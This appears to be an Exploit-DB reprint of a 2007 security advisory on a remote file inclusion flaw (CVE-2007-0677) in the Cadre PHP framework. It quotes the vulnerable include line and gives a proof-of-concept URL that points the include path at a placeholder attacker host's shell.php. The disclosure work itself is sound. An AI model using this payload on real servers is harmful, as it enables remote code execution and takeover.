Cadre PHP Framework - Remote File Inclusion

EDB-ID:

3237

CVE:

2007-0677

EDB Verified:

Author:

y3dips

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2007-01-31

Vulnerable App: 
____________________   ___ ___ ________
\_   _____/\_   ___ \ /   |   \\_____  \
 |    __)_ /    \  \//    ~    \/   |   \
 |        \\     \___\    Y    /    |    \
/_______  / \______  /\___|_  /\_______  /
        \/         \/       \/         \/                              .OR.ID
ECHO_ADV_63$2007

------------------------------------------------------------------------------------
[ECHO_ADV_63$2007] Cadre remote file inclusion
------------------------------------------------------------------------------------

Author		: Ahmad Muammar W.K (a.k.a) y3dips
Date Found	: January, 31st 2007
Location	: Indonesia, Jakarta
web		: http://echo.or.id/adv/adv63-y3dips-2007.txt
Critical Lvl	: Critical
------------------------------------------------------------------------------------


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application   : Cadre
URL           : http://www.cronosys.com | http://savannah.gnu.org/projects/cadre/
Download-path : http://ftp.azc.uam.mx/mirrors/gnu/savannah/files/cadre/cadre-20020724.tar.gz

Description   : Cadre is a PHP framework for developing large business applications. 
		It currently supports PostgreSQL as the database back end (although 
		this is extensible). We (Cronosys, LLC) have invested two and a half 
		years in this framework and applications based on this framework.

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~

	---------------class.Quick_Config_Browser.php --------------------
	...
	include_once($GLOBALS[config][framework_path] . "class.Browser.php");
	...
	------------------------------------------------------------------


	An attacker can exploit this vulnerability with a simple php injection script.

Poc/Exploit:
~~~~~~~~

http://target/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=http://attacker/shell.php?

---------------------------------------------------------------------------
Shoutz:
~~~
~ my lovely ana
~ k-159 (my greatest brotha), the_day (young evil thinker), and all echo staff
~ str0ke, waraxe, negative
~ newbie_hacker@yahoogroups.com
~ #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------
Contact:
~~~~

     y3dips|| echo|staff || y3dips[at]gmail[dot]com
     Homepage: http://y3dips.echo.or.id/

# milw0rm.com [2007-01-31]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services